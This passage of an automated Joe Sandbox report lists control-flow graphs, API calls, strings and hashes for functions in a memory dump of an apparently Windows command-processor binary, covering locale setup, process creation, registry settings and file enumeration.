7ff71967bcac-7ff71967bcbf 314->327 315->312 319->285 336 7ff71966ac81-7ff71966ac85 319->336 320->310 321->221 331 7ff71967bbba-7ff71967bbbd call 7ff7196713e0 322->331 332 7ff71967be4a-7ff71967be5e 323->332 333 7ff71967bd79-7ff71967bd8b iswxdigit 323->333 324->337 356 7ff71966ac11-7ff71966ac14 324->356 325->237 326->325 327->322 329->312 330->329 338 7ff71967bbac 330->338 331->321 332->331 333->332 342 7ff71967bd91-7ff71967bda3 iswxdigit 333->342 340 7ff71966ac88-7ff71966ac8f 336->340 337->232 338->322 339->249 357 7ff71967bf37-7ff71967bf3e call 7ff719663240 339->357 340->340 348 7ff71966ac91-7ff71966ac94 340->348 342->332 345 7ff71967bda9-7ff71967bdbb iswxdigit 342->345 345->332 349 7ff71967bdc1-7ff71967bdd7 iswdigit 345->349 348->285 353 7ff71966ac96-7ff71966acaa wcsrchr 348->353 354 7ff71967bdd9-7ff71967bddd 349->354 355 7ff71967bddf-7ff71967bdeb towlower 349->355 353->285 358 7ff71966acac-7ff71966acb9 call 7ff719671300 353->358 359 7ff71967bdee-7ff71967be0f iswdigit 354->359 355->359 356->337 360 7ff71966ac1a-7ff71966ac33 memset 356->360 357->249 358->285 363 7ff71967be17-7ff71967be23 towlower 359->363 364 7ff71967be11-7ff71967be15 359->364 360->308 365 7ff71966ac35-7ff71966ac4b wcschr 360->365 366 7ff71967be26-7ff71967be45 call 7ff7196713e0 363->366 364->366 365->308 367 7ff71966ac4d-7ff71966ac54 365->367 366->332 368 7ff71966ac5a-7ff71966ac6f wcschr 367->368 369 7ff71966ad72-7ff71966ad91 wcschr 367->369 368->308 368->369 371 7ff71966ad97-7ff71966adac wcschr 369->371 372 7ff71966af03-7ff71966af07 369->372 371->372 373 7ff71966adb2-7ff71966adc7 wcschr 371->373 372->308 373->372 374 7ff71966adcd-7ff71966ade2 wcschr 373->374 374->372 375 7ff71966ade8-7ff71966adfd wcschr 374->375 375->372 376 7ff71966ae03-7ff71966ae18 wcschr 375->376 376->372 377 7ff71966ae1e-7ff71966ae21 376->377 378 7ff71966ae24-7ff71966ae27 377->378 378->372 379 7ff71966ae2d-7ff71966ae40 iswspace 378->379 380 7ff71966ae4b-7ff71966ae5e 379->380 381 7ff71966ae42-7ff71966ae49 379->381 382 7ff71966ae66-7ff71966ae6d 380->382 381->378 382->382 383 7ff71966ae6f-7ff71966ae77 382->383 383->258 384 7ff71966ae7d-7ff71966ae97 call 7ff7196713e0 383->384 387 7ff71966ae9a-7ff71966aea4 384->387 388 7ff71966aebc-7ff71966aef8 call 7ff719670a6c call 7ff71966ff70 * 2 387->388 389 7ff71966aea6-7ff71966aead 387->389 388->319 397 7ff71966aefe 388->397 389->388 390 7ff71966aeaf-7ff71966aeba 389->390 390->387 390->388 397->279
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                    • String ID: :$:$:$:ON$OFF
                                                                    • API String ID: 972821348-467788257
                                                                    • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                    • Instruction ID: 97262ecf8e79902d50769dc8b569dd8ca6c92f8ad9d7ad7864de2d5724bb48ad
                                                                    • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                    • Instruction Fuzzy Hash: AA22A421A08E4286EB58BF259514279E6B3EF55BA9FC89035CA0E47794DF3CE44EC370

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 398 7ff7196751ec-7ff719675248 call 7ff719675508 GetLocaleInfoW 401 7ff71967524e-7ff719675272 GetLocaleInfoW 398->401 402 7ff71967ef32-7ff71967ef3c 398->402 403 7ff719675295-7ff7196752b9 GetLocaleInfoW 401->403 404 7ff719675274-7ff71967527a 401->404 405 7ff71967ef3f-7ff71967ef49 402->405 410 7ff7196752de-7ff719675305 GetLocaleInfoW 403->410 411 7ff7196752bb-7ff7196752c3 403->411 408 7ff7196754f7-7ff7196754f9 404->408 409 7ff719675280-7ff719675286 404->409 406 7ff71967ef4b-7ff71967ef52 405->406 407 7ff71967ef61-7ff71967ef6c 405->407 406->407 412 7ff71967ef54-7ff71967ef5f 406->412 415 7ff71967ef75-7ff71967ef78 407->415 408->402 409->408 413 7ff71967528c-7ff71967528f 409->413 416 7ff719675307-7ff71967531b 410->416 417 7ff719675321-7ff719675343 GetLocaleInfoW 410->417 414 7ff7196752c9-7ff7196752d7 411->414 411->415 412->405 412->407 413->403 414->410 420 7ff71967ef7a-7ff71967ef7d 415->420 421 7ff71967ef99-7ff71967efa3 415->421 416->417 418 7ff719675349-7ff71967536e GetLocaleInfoW 417->418 419 7ff71967efaf-7ff71967efb9 417->419 422 7ff719675374-7ff719675396 GetLocaleInfoW 418->422 423 7ff71967eff2-7ff71967effc 418->423 425 7ff71967efbc-7ff71967efc6 419->425 420->410 424 7ff71967ef83-7ff71967ef8d 420->424 421->419 427 7ff71967539c-7ff7196753be GetLocaleInfoW 422->427 428 7ff71967f035-7ff71967f03f 422->428 426 7ff71967efff-7ff71967f009 423->426 424->421 429 7ff71967efde-7ff71967efe9 425->429 430 7ff71967efc8-7ff71967efcf 425->430 431 7ff71967f00b-7ff71967f012 426->431 432 7ff71967f021-7ff71967f02c 426->432 433 7ff71967f078-7ff71967f082 427->433 434 7ff7196753c4-7ff7196753e6 GetLocaleInfoW 427->434 435 7ff71967f042-7ff71967f04c 428->435 429->423 430->429 436 7ff71967efd1-7ff71967efdc 430->436 431->432 437 7ff71967f014-7ff71967f01f 431->437 432->428 442 7ff71967f085-7ff71967f08f 433->442 438 7ff71967f0bb-7ff71967f0c5 434->438 439 7ff7196753ec-7ff71967540e GetLocaleInfoW 434->439 440 7ff71967f04e-7ff71967f055 435->440 441 7ff71967f064-7ff71967f06f 435->441 436->425 436->429 437->426 437->432 443 7ff71967f0c8-7ff71967f0d2 438->443 444 7ff71967f0fe-7ff71967f108 439->444 445 7ff719675414-7ff719675436 GetLocaleInfoW 439->445 440->441 446 7ff71967f057-7ff71967f062 440->446 441->433 447 7ff71967f0a7-7ff71967f0b2 442->447 448 7ff71967f091-7ff71967f098 442->448 449 7ff71967f0ea-7ff71967f0f5 443->449 450 7ff71967f0d4-7ff71967f0db 443->450 453 7ff71967f10b-7ff71967f115 444->453 451 7ff71967543c-7ff71967545e GetLocaleInfoW 445->451 452 7ff71967f141-7ff71967f14b 445->452 446->435 446->441 447->438 448->447 454 7ff71967f09a-7ff71967f0a5 448->454 449->444 450->449 455 7ff71967f0dd-7ff71967f0e8 450->455 456 7ff71967f184-7ff71967f18b 451->456 457 7ff719675464-7ff719675486 GetLocaleInfoW 451->457 460 7ff71967f14e-7ff71967f158 452->460 458 7ff71967f12d-7ff71967f138 453->458 459 7ff71967f117-7ff71967f11e 453->459 454->442 454->447 455->443 455->449 463 7ff71967f18e-7ff71967f198 456->463 464 7ff71967548c-7ff7196754ae GetLocaleInfoW 457->464 465 7ff71967f1c4-7ff71967f1ce 457->465 458->452 459->458 466 7ff71967f120-7ff71967f12b 459->466 461 7ff71967f15a-7ff71967f161 460->461 462 7ff71967f170-7ff71967f17b 460->462 461->462 467 7ff71967f163-7ff71967f16e 461->467 462->456 468 7ff71967f19a-7ff71967f1a1 463->468 469 7ff71967f1b0-7ff71967f1bb 463->469 470 7ff71967f207-7ff71967f20e 464->470 471 7ff7196754b4-7ff7196754f5 setlocale call 7ff719678f80 464->471 472 7ff71967f1d1-7ff71967f1db 465->472 466->453 466->458 467->460 467->462 468->469 474 7ff71967f1a3-7ff71967f1ae 468->474 469->465 473 7ff71967f211-7ff71967f21b 470->473 476 7ff71967f1dd-7ff71967f1e4 472->476 477 7ff71967f1f3-7ff71967f1fe 472->477 478 7ff71967f21d-7ff71967f224 473->478 479 7ff71967f233-7ff71967f23e 473->479 474->463 474->469 476->477 481 7ff71967f1e6-7ff71967f1f1 476->481 477->470 478->479 482 7ff71967f226-7ff71967f231 478->482 481->472 481->477 482->473 482->479
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$DefaultUsersetlocale
                                                                    • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                    • API String ID: 1351325837-2236139042
                                                                    • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                    • Instruction ID: 7e32d956b524dbf330336d3798bfefe9ca1359009d550b09cb8ff1c14cdd1532
                                                                    • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                    • Instruction Fuzzy Hash: 23F14931B08B4285EB29AF15D9106B9A2B6BF05BA8FD45175CA0D477A4EF3CE50EC330

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 483 7ff719674224-7ff7196742a5 InitializeProcThreadAttributeList 484 7ff7196742ab-7ff7196742e5 UpdateProcThreadAttribute 483->484 485 7ff71967ecd4-7ff71967ecee GetLastError call 7ff719689eec 483->485 487 7ff7196742eb-7ff7196743c6 memset * 2 GetStartupInfoW call 7ff719673a90 call 7ff71966b900 484->487 488 7ff71967ecf0-7ff71967ed19 GetLastError call 7ff719689eec DeleteProcThreadAttributeList 484->488 492 7ff71967ed1e 485->492 497 7ff7196743cc-7ff7196743d3 487->497 498 7ff719674638-7ff719674644 _local_unwind 487->498 488->492 499 7ff719674649-7ff719674650 497->499 500 7ff7196743d9-7ff7196743dc 497->500 498->499 499->500 503 7ff719674656-7ff71967465d 499->503 501 7ff7196743de-7ff7196743f5 wcsrchr 500->501 502 7ff719674415-7ff719674424 call 7ff719675a68 500->502 501->502 504 7ff7196743f7-7ff71967440f lstrcmpW 501->504 510 7ff719674589-7ff719674590 502->510 511 7ff71967442a-7ff719674486 CreateProcessW 502->511 503->502 506 7ff719674663 503->506 504->502 507 7ff719674668-7ff71967466d call 7ff719689044 504->507 506->500 507->502 510->511 514 7ff719674596-7ff7196745fa CreateProcessAsUserW 510->514 513 7ff71967448b-7ff71967448f 511->513 515 7ff719674495-7ff7196744c7 CloseHandle call 7ff71967498c 513->515 516 7ff719674672-7ff719674682 GetLastError 513->516 514->513 519 7ff71967468d-7ff719674694 515->519 520 7ff7196744cd-7ff7196744e5 515->520 516->519 521 7ff719674696-7ff7196746a0 519->521 522 7ff7196746a2-7ff7196746ac 519->522 523 7ff7196744eb-7ff7196744f2 520->523 524 7ff7196747a3-7ff7196747a9 520->524 521->522 525 7ff7196746ae-7ff7196746b5 call 7ff7196797bc 521->525 522->525 526 7ff719674705-7ff719674707 522->526 528 7ff7196744f8-7ff719674507 523->528 529 7ff7196745ff-7ff719674607 523->529 538 7ff7196746b7-7ff719674701 call 7ff7196bc038 525->538 539 7ff719674703 525->539 526->520 527 7ff71967470d-7ff71967472a call 7ff71966cd90 526->527 547 7ff71967473d-7ff719674767 call 7ff7196713e0 call 7ff719689eec call 7ff71966ff70 _local_unwind 527->547 548 7ff71967472c-7ff719674738 _local_unwind 527->548 533 7ff71967450d-7ff719674553 call 7ff719675cb4 call 7ff7196733f0 call 7ff71967498c 528->533 534 7ff719674612-7ff719674616 528->534 529->528 535 7ff71967460d 529->535 564 7ff719674558-7ff71967455e 533->564 540 7ff71967461c-7ff719674633 534->540 541 7ff7196747d7-7ff7196747df 534->541 537 7ff71967476c-7ff719674773 535->537 537->528 544 7ff719674779-7ff719674780 537->544 538->526 539->526 546 7ff7196747f2-7ff71967483c call 7ff71966ff70 DeleteProcThreadAttributeList call 7ff719678f80 540->546 541->546 549 7ff7196747e1-7ff7196747ed CloseHandle 541->549 544->528 552 7ff719674786-7ff719674789 544->552 547->537 548->547 549->546 552->528 557 7ff71967478f-7ff719674792 552->557 557->524 561 7ff719674794-7ff71967479d call 7ff71968a250 557->561 561->524 561->528 567 7ff7196747ae-7ff7196747ca call 7ff7196733f0 564->567 568 7ff719674564-7ff719674579 call 7ff71967498c 564->568 567->541 568->546 576 7ff71967457f-7ff719674584 call 7ff71968a920 568->576 576->546
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                    • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                    • API String ID: 388421343-2905461000
                                                                    • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                    • Instruction ID: edf75a4013c308537c1351de25db269e68b6bbae3132b44bf6135d55df292c20
                                                                    • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                    • Instruction Fuzzy Hash: B0F15D31A08F8296EA24EF11E4547B9F7B6FB85BA8F804135DA4D46654DF3CE44ACB30

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 579 7ff719675554-7ff7196755b9 call 7ff71967a640 582 7ff7196755bc-7ff7196755e8 RegOpenKeyExW 579->582 583 7ff7196755ee-7ff719675631 RegQueryValueExW 582->583 584 7ff719675887-7ff71967588e 582->584 585 7ff71967f248-7ff71967f24d 583->585 586 7ff719675637-7ff719675675 RegQueryValueExW 583->586 584->582 587 7ff719675894-7ff7196758db time srand call 7ff719678f80 584->587 591 7ff71967f260-7ff71967f265 585->591 592 7ff71967f24f-7ff71967f25b 585->592 588 7ff71967568e-7ff7196756cc RegQueryValueExW 586->588 589 7ff719675677-7ff71967567c 586->589 595 7ff71967f2b6-7ff71967f2bb 588->595 596 7ff7196756d2-7ff719675710 RegQueryValueExW 588->596 593 7ff71967f28b-7ff71967f290 589->593 594 7ff719675682-7ff719675687 589->594 591->586 598 7ff71967f26b-7ff71967f286 _wtol 591->598 592->586 593->588 601 7ff71967f296-7ff71967f2b1 _wtol 593->601 594->588 602 7ff71967f2ce-7ff71967f2d3 595->602 603 7ff71967f2bd-7ff71967f2c9 595->603 599 7ff719675729-7ff719675767 RegQueryValueExW 596->599 600 7ff719675712-7ff719675717 596->600 598->586 607 7ff719675769-7ff71967576e 599->607 608 7ff71967579f-7ff7196757dd RegQueryValueExW 599->608 605 7ff71967571d-7ff719675722 600->605 606 7ff71967f2f9-7ff71967f2fe 600->606 601->588 602->596 604 7ff71967f2d9-7ff71967f2f4 _wtol 602->604 603->596 604->596 605->599 606->599 609 7ff71967f304-7ff71967f31a wcstol 606->609 610 7ff719675774-7ff71967578f 607->610 611 7ff71967f320-7ff71967f325 607->611 612 7ff71967f3a9 608->612 613 7ff7196757e3-7ff7196757e8 608->613 609->611 616 7ff71967f357-7ff71967f35e 610->616 617 7ff719675795-7ff719675799 610->617 614 7ff71967f34b 611->614 615 7ff71967f327-7ff71967f33f wcstol 611->615 620 7ff71967f3b5-7ff71967f3b8 612->620 618 7ff7196757ee-7ff719675809 613->618 619 7ff71967f363-7ff71967f368 613->619 614->616 615->614 616->608 617->608 617->616 623 7ff71967f39a-7ff71967f39d 618->623 624 7ff71967580f-7ff719675813 618->624 621 7ff71967f38e 619->621 622 7ff71967f36a-7ff71967f382 wcstol 619->622 625 7ff71967f3be-7ff71967f3c5 620->625 626 7ff71967582c 620->626 621->623 622->621 623->612 624->623 627 7ff719675819-7ff719675823 624->627 630 7ff719675832-7ff719675870 RegQueryValueExW 625->630 629 7ff71967f3ca-7ff71967f3d1 626->629 626->630 627->620 628 7ff719675829 627->628 628->626 631 7ff71967f3dd-7ff71967f3e2 629->631 630->631 632 7ff719675876-7ff719675882 RegCloseKey 630->632 633 7ff71967f3e4-7ff71967f412 ExpandEnvironmentStringsW 631->633 634 7ff71967f433-7ff71967f439 631->634 632->584 636 7ff71967f428 633->636 637 7ff71967f414-7ff71967f426 call 7ff7196713e0 633->637 634->632 635 7ff71967f43f-7ff71967f44c call 7ff71966b900 634->635 635->632 640 7ff71967f42e 636->640 637->640 640->634
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpensrandtime
                                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                    • API String ID: 145004033-3846321370
                                                                    • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                    • Instruction ID: 8dfb8210560bba29bb15b528994f97170f1af16e267e284967015400b3b04b54
                                                                    • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                    • Instruction Fuzzy Hash: B8E1703251CE82C6E750AF10E45057AF7B2FB89769F806175E68E02A58DF7CD54ACB30

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 821 7ff7196737d8-7ff719673887 GetCurrentThreadId OpenThread call 7ff7196704f4 HeapSetInformation RegOpenKeyExW 824 7ff71967388d-7ff7196738eb call 7ff719675920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff71967e9f8-7ff71967ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff71967ea41-7ff71967ea59 GetThreadLocale 824->828 829 7ff7196738f1-7ff719673913 memset 824->829 825->828 830 7ff71967ea5b-7ff71967ea67 828->830 831 7ff71967ea74-7ff71967ea77 828->831 832 7ff719673919-7ff719673935 call 7ff719674d5c 829->832 833 7ff71967eaa5 829->833 830->831 834 7ff71967ea79-7ff71967ea7d 831->834 835 7ff71967ea94-7ff71967ea96 831->835 841 7ff71967393b-7ff719673942 832->841 842 7ff71967eae2-7ff71967eaff call 7ff719663240 call 7ff719688530 call 7ff719674c1c 832->842 838 7ff71967eaa8-7ff71967eab4 833->838 834->835 837 7ff71967ea7f-7ff71967ea89 834->837 835->833 837->835 838->832 840 7ff71967eaba-7ff71967eac3 838->840 843 7ff71967eacb-7ff71967eace 840->843 845 7ff71967eb27-7ff71967eb40 _setjmp 841->845 846 7ff719673948-7ff719673962 _setjmp 841->846 852 7ff71967eb00-7ff71967eb0d 842->852 847 7ff71967eac5-7ff71967eac9 843->847 848 7ff71967ead0-7ff71967eadb 843->848 853 7ff7196739fe-7ff719673a05 call 7ff719674c1c 845->853 854 7ff71967eb46-7ff71967eb49 845->854 851 7ff719673968-7ff71967396d 846->851 846->852 847->843 848->838 849 7ff71967eadd 848->849 849->832 858 7ff7196739b9-7ff7196739bb 851->858 859 7ff71967396f 851->859 867 7ff71967eb15-7ff71967eb1f call 7ff719674c1c 852->867 853->825 855 7ff71967eb4b-7ff71967eb65 call 7ff719663240 call 7ff719688530 call 7ff719674c1c 854->855 856 7ff71967eb66-7ff71967eb6f call 7ff7196701b8 854->856 855->856 880 7ff71967eb87-7ff71967eb89 call 7ff7196786f0 856->880 881 7ff71967eb71-7ff71967eb82 _setmode 856->881 862 7ff7196739c1-7ff7196739c3 call 7ff719674c1c 858->862 863 7ff71967eb20 858->863 866 7ff719673972-7ff71967397d 859->866 877 7ff7196739c8 862->877 863->845 873 7ff7196739c9-7ff7196739de call 7ff71966df60 866->873 874 7ff71967397f-7ff719673984 866->874 867->863 873->867 889 7ff7196739e4-7ff7196739e8 873->889 874->866 882 7ff719673986-7ff7196739ae call 7ff719670580 GetConsoleOutputCP GetCPInfo call 7ff7196704f4 874->882 877->873 890 7ff71967eb8e-7ff71967ebad call 7ff7196758e4 call 7ff71966df60 880->890 881->880 896 7ff7196739b3 882->896 889->853 893 7ff7196739ea-7ff7196739ef call 7ff71966be00 889->893 902 7ff71967ebaf-7ff71967ebb3 890->902 900 7ff7196739f4-7ff7196739fc 893->900 896->858 900->874 902->853 903 7ff71967ebb9-7ff71967ec24 call 7ff7196758e4 GetConsoleOutputCP GetCPInfo call 7ff7196704f4 call 7ff71966be00 call 7ff719670580 GetConsoleOutputCP GetCPInfo call 7ff7196704f4 902->903 903->890
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                    • API String ID: 2624720099-1920437939
                                                                    • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                    • Instruction ID: 372395347bc7f403845c0ec8cf9fb05f93f94c058e85580c472d7e823e1e84b7
                                                                    • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                    • Instruction Fuzzy Hash: 13C19331E08E428AF718BF65A451578EAB3BF45B6CFC45139D90E466A1DE3CE44E8730

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1118 7ff71967823c-7ff71967829b FindFirstFileExW 1119 7ff7196782cd-7ff7196782df 1118->1119 1120 7ff71967829d-7ff7196782a9 GetLastError 1118->1120 1124 7ff719678365-7ff71967837b FindNextFileW 1119->1124 1125 7ff7196782e5-7ff7196782ee 1119->1125 1121 7ff7196782af 1120->1121 1122 7ff7196782b1-7ff7196782cb 1121->1122 1126 7ff71967837d-7ff719678380 1124->1126 1127 7ff7196783d0-7ff7196783e5 FindClose 1124->1127 1128 7ff7196782f1-7ff7196782f4 1125->1128 1126->1119 1129 7ff719678386 1126->1129 1127->1128 1130 7ff719678329-7ff71967832b 1128->1130 1131 7ff7196782f6-7ff719678300 1128->1131 1129->1120 1130->1121 1134 7ff71967832d 1130->1134 1132 7ff719678332-7ff719678353 GetProcessHeap HeapAlloc 1131->1132 1133 7ff719678302-7ff71967830e 1131->1133 1137 7ff719678356-7ff719678363 1132->1137 1135 7ff71967838b-7ff7196783c2 GetProcessHeap HeapReAlloc 1133->1135 1136 7ff719678310-7ff719678313 1133->1136 1134->1120 1138 7ff7196850f8-7ff71968511e GetLastError FindClose 1135->1138 1139 7ff7196783c8-7ff7196783ce 1135->1139 1140 7ff719678327 1136->1140 1141 7ff719678315-7ff719678323 1136->1141 1137->1136 1138->1122 1139->1137 1140->1130 1141->1140
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileFindFirstLast
                                                                    • String ID:
                                                                    • API String ID: 873889042-0
                                                                    • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                    • Instruction ID: 835eafb7b527276c2d2f4fdca0a96576d702c344328a989d88d079be262578c1
                                                                    • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                    • Instruction Fuzzy Hash: 5E514B31A09F428AE704AF11E554579FBB2FB49BAAF849131CA1D43350DF3CE85A8770

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
